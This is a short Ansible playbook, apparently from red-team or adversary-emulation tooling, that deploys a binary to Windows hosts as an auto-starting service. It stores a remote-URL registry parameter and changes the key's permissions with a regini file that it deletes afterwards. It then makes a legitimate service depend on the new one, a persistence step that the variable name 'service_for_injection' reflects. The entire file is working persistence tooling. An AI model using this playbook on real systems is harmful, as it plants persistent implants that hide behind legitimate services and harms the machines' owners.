---
- name: "Download binary, configure service and run commands on Windows"
  hosts: all
  tasks:

    # Copy the respective file from the Ansible controller to the target machine
    - name: "Copy file from Ansible controller to Windows host"
      win_copy:
        src: "{{ binary_location }}"
        dest: "{{ path_to_download }}"

    # Create the service
    - name: "Create the service using cmd"
      win_command:
        cmd: sc create "{{ service_name }}" binPath= "{{ path_to_download }}"\\"{{ binary_name }}" start= auto
    
    # Create 2 registry key parameters
    - name: "Add registry parameters"
      win_regedit:
        path: "{{ reg_key_param }}{{ service_name }}"
        name: "{{ item.name }}"
        data: "{{ item.value }}"
        type: string
        state: present
      loop:
        - { name: "RemoteUrl", value: "/{{ group_names[0] }}{{ hostvars[inventory_hostname].file_to_download }}" }
        - { name: "LocalDir", value: "{{ path_for_comm }}" }

    # Change permissions on registry
    - name: "Change permissions on registry"
      win_shell: |
        cmd /c "echo {{ reg_key_param }}{{ service_name}} [19] > C:\Windows\Temp\set_perm.regini
        cmd /c "regini C:\Windows\Temp\set_perm.regini"
        cmd /c "del C:\Windows\Temp\set_perm.regini"

    # Change dependency of legitimate service
    - name: "Change dependency of legitimate service"
      win_command: |
        cmd /c "sc config {{ service_for_injection }} depend= {{ service_name }}"

    # Start the service
    - name: "Start the service"
      win_service:
        name: "{{ service_name }}"
        state: started
